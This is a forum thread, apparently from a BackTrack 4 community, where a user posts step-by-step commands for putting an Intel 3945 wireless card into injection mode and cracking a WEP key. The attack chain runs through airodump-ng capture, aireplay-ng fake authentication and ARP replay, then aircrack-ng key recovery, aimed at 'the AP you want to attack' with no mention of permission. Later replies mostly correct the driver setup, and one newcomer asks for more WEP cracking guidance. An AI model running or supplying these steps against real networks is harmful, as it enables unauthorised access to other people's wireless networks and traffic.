HOW TO: iwl3945 BackTrack 4

[stuball]

Right, I spent ages trying to get this to work, following various tutorials and I eventually managed to get it working... Very well in fact, 64 bit wep in <2mins.

The most important part ends after "ifconfig wifi0 up" because at that point your iwl3945 is ready to inject, after that its a fake auth WEP attack, but it should work nonetheless.

1. type iwconfig, it should show you eth0, eth1 and wlan0

2. airodump-ng wlan0 and note down the BSSID(MAC) and channel of the AP you want to attack, then ctrl+c to quit it.

3. Configure your card to use ipwraw:

Install:
wget hxxp://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2
cd ipwraw-ng*
make
make install_ucode
make install

Use:
modprobe -r iwl3945
modprobe ipwraw

Configure:

ifconfig wifi0 down

We need to edit a few files, i find nano to be the easiest editor, ctrl+o saves a file, and ctrl+x exits.

Change the below file to the AP BSSID
nano /sys/class/net/wifi0/device/bssid

Change the below file to the AP's Channel
nano /sys/class/net/wifi0/device/channel

Change the value from 108 to 2
nano /sys/class/net/wifi0/device/rate

ifconfig wifi0 up

Right, thats your card set for injection! It actually works!

To crack a wep key using the fake auth method:

airodump-ng -w output.cap rtap0
leave it running and in a new window...

aireplay-ng -1 0 -a APMAChere wifi0
it should try and associate with the access point, you are looking for association successful. in a new window...

aireplay-ng -3 -b APMAChere wifi0
it should start injecting the AP, you are looking for the arp count to rise!
in a new window...

aircrack-ng output*.cap
Select your network from the list... you are looking for key found! you might need to try again as the IV count goes up (hopefully quickly).

This is how I made it work, if anyone knows a quicker/easier way then go for it, none that I found worked for me. This is a mix of a few!
Hope this saves someone some time of encourages them to give it another go.

[g0th4x]

Could this work for 4965agn maybe ?

[thundernode]

The drivers included with backtrack 4 are the most up to date and functional available for the 3945. I'm not sure why you would go through all of that trouble to use outdated drivers.

All that is needed is a simple

Code:

airmon-ng start wifi0

[larryhaja]

ipwraw is outdated. The iwl3945 driver has much better support for injection already built into the driver since kernel 2.6.27. All that is needed is

Code:

# airmon-ng start wlan0

This creates the monitor interface mon0. I would stay away from ipwraw and stick with iwl3945.

[stuball]

Yes I would have to agree, shortly after writing this I found that out for myself... there really is so much info out there on how to get this card to work that is complete rubbish, and what I wrote was a mix of about 4 tutorials. I can't believe I spent hours on this! Anyhoo...

airmon-ng start wlan0
starts mon0 as a monitor interface...

airodump runs on the mon 0 interface, aireplay runs on the wlan0 interface.

One thing that my tutorial may help with is people wissing to use wesside-ng. It doesn't seem like the BT4 built in drivers but runs fine using ipwraw.

Apart form that one saving grace, my efforts were incredibly stupid.... I blame google!

[mbmalone]

Vendor: Intel Corporation
Description: PRO/Wireless 3945ABG [Golan] Network Connection
Module: iwl3945

Working fine, without modifications.

airmon-ng start wlan0

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)

dmesg | grep firmware

iwl3945 0000:02:00.0: firmware: requesting iwlwifi-3945-2.ucode
iwl3945 loaded firmware version 15.28.2.8

[GrayFox.i0n]

Hi...

After the make command i get an error, and i wont be able to compile this drivers......

iwl3945 does not support packet injection... am i wrong?

I am trying this from a live usb system

[imported_SuspectZero]

read the posts before yours. bt4 already comes with the latest top of the line drivers for the intel 3945abg. this whole tutorial (though could be usefull) is unnecessary in bt4. to start ur 3945abg in monitor mode just type

airmon-ng start wlan0

[GrayFox.i0n]

But i am unable to inject any packets at all still......

Is there any useful guide for wep cracking with backtrack 4 and this wifi card specifically?

Im a bit new, and have really limited knowedgement regarding the aircrack suite.....

Thnaks!!!

[imported_SuspectZero]

But i am unable to inject any packets at all still......

Is there any useful guide for wep cracking with backtrack 4 and this wifi card specifically?

Im a bit new, and have really limited knowedgement regarding the aircrack suite.....

Thnaks!!!

http://img37.imageshack.us/img37/8686/bakay.jpg

did you even try?! honestly.